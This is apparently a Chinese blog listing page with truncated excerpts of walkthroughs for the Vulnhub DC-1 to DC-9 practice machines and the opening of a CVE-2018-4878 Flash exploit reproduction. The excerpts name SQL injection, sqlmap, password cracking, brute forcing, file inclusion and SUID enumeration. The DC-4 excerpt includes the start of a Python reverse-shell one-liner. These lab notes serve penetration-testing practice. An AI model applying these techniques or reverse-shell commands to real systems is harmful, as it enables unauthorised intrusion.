Vulnhub靶机DC-9通关笔记
¶前言
这是DC系列的最后一个靶机
下载地址:https://www.vulnhub.com/entry/dc-9,412/
¶开始
nmap 扫描
开放80端口
search有注入
得到账号密码
在另外一个数据库得到admin的账号密码
注意到这里 可能存在文件包含
果然存在文件包含
想包含日志文件发现包含不了
看了大佬的wp学到了新思路
/etc/knockd.conf
如果你有一台公众可访问的服务器,黑客可以轻松扫描其IP地址,查找服务器上的开放端口(尤其是用于SSH的端口22)。将服务器隐藏起来、不让黑客看见的一种方法是使用...
Vulnhub靶机DC-8通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-8,367/
双因素认证?
¶开始
nmap 扫描
开放了80和22端口
马上找到注入一枚
sqlmap一把梭
john是一个密码破解工具
https://blog.csdn.net/mikayong/article/details/6903201
使用教程
破解成功
找到一个getshell点
但是好像不行
直接反弹shell
没有找到什么有用的信息
sudo -l需要密码
查看SUID命令
find / -perm -u=s -type f 2>...
Vulnhub靶机DC-7通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-7,356/
¶开始
nmap扫描
开放了80和22
各种扫描 Nday都试过了没用
看了wp提示 关键在@DC7USER上
搜到了他的github
看来这是要结合社工的
在config.php得到密码
试一试用ssh登陆
登陆上了
mbox的内容
好像是自动备份
drush引起了我的注意
https://blog.csdn.net/qq_15936309/article/details/86590353
修改了admin的密码
进入后台
没有ph...
Vulnhub靶机DC-6通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-6,315/
吸取教训 认真看靶机的描述 发现有线索提示 不至于摸瞎
¶开始
开了80和22端口
和前几个靶机的套路一样 要改hosts文件
vim /etc/hosts
用的是wordpress
用wpscan扫出了几个用户
按照先前的提示应该是爆破账号
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
爆破出来一个
登陆 看到安装了个插件
Activity Monit...
Vulnhub靶机DC-5通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-5,314/
¶开始
起手nmap扫描
开放了80和111端口
80端口是很简单的页面
交互的只有
thankyou.php
接着看111端口的rpc服务
都是拒绝服务的漏洞 没有什么实质的帮助
那怎么搞啊
记住做vulnhub的靶机 有一个很重要的经验就是要看下载页面的提示,虽然是英文但是可以少走很多弯路
You need to look for something a little out of the ordinary (something that c...
Vulnhub靶机DC-4通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-4,313/
¶开始
nmap 扫描
开了80 和22 端口
要登陆
dirb http://192.168.123.7 扫描一下目录
没有什么有用的信息
用burpsuite爆破一下
爆破出来了 虽然不知道是哪个密码 但是进去了
发现可以命令执行
反弹一个shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM...
Vulnhub靶机DC-3通关笔记
¶前言
乘热打铁继续做
下载地址:https://www.vulnhub.com/entry/dc-3,312/
¶开始
扫描端口
只有80端口开放
访问
只有一个flag 一个入口点没有线索
目标是拿到root权限
用whatweb看看是用什么写的
用的是Joomla!写的
用joomscan来扫描一下
https://github.com/rezasp/joomscan
版本是3.7
去搜索一下3.7的漏洞找到一个sql注入漏洞
https://firedebug.github.io/PHP/Joomla3.7.0SQL注入/
http:/...
Vulnhub靶机DC-2通关笔记
¶前言
昨天做了DC-1感觉还不错 ,今天继续攻克DC-2
下载地址:https://www.vulnhub.com/entry/dc-2,311/
¶开始
nmap扫描
只有一个80端口和7744端口
访问发现会重定向到http://dc-2 然后显示找不到服务器的ip
重新设置一下host就可以
vim /etc/hosts
然后就访问上了
找到第一个flag
你常用的字典可能不适用,要用cewl生成的字典
意思就是让我们登陆
既然是wordpress的站点就可以用kali自带的wpscan这个工具来扫描一下看看有什么发现
有三个用户
...
Vulnhub靶机DC-1通关笔记
¶前言
最近有考OSCP的想法,并且好久没有做过渗透了,所以打算拿Vulnhub的靶机来练习,Dm大佬的内网渗透的书也到了,有空做一下完整的内网渗透练习,恢复一下渗透能力,回顾遗忘的知识点。
靶机链接: https://www.vulnhub.com/entry/dc-1,292/
¶开始
把靶机和攻击机kali都脸上Host-Only网络
主机发现 靶机的ip为192.168.123.3
发现靶机开放了80 22 111端口
80端口部署的是Drupal 7 内容管理框架
先查有没有Nday可以利用
有一个php 远程代码执行在msf可以直...
CVE-2018-4878复现
¶前言
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。
##复现环境
靶机:win7 sp1
攻击机:kali linux
exp:https://github.com/anbai-inc/CVE-2018-4878
flash版本:Adobe Flash 28.0.0.137
¶流...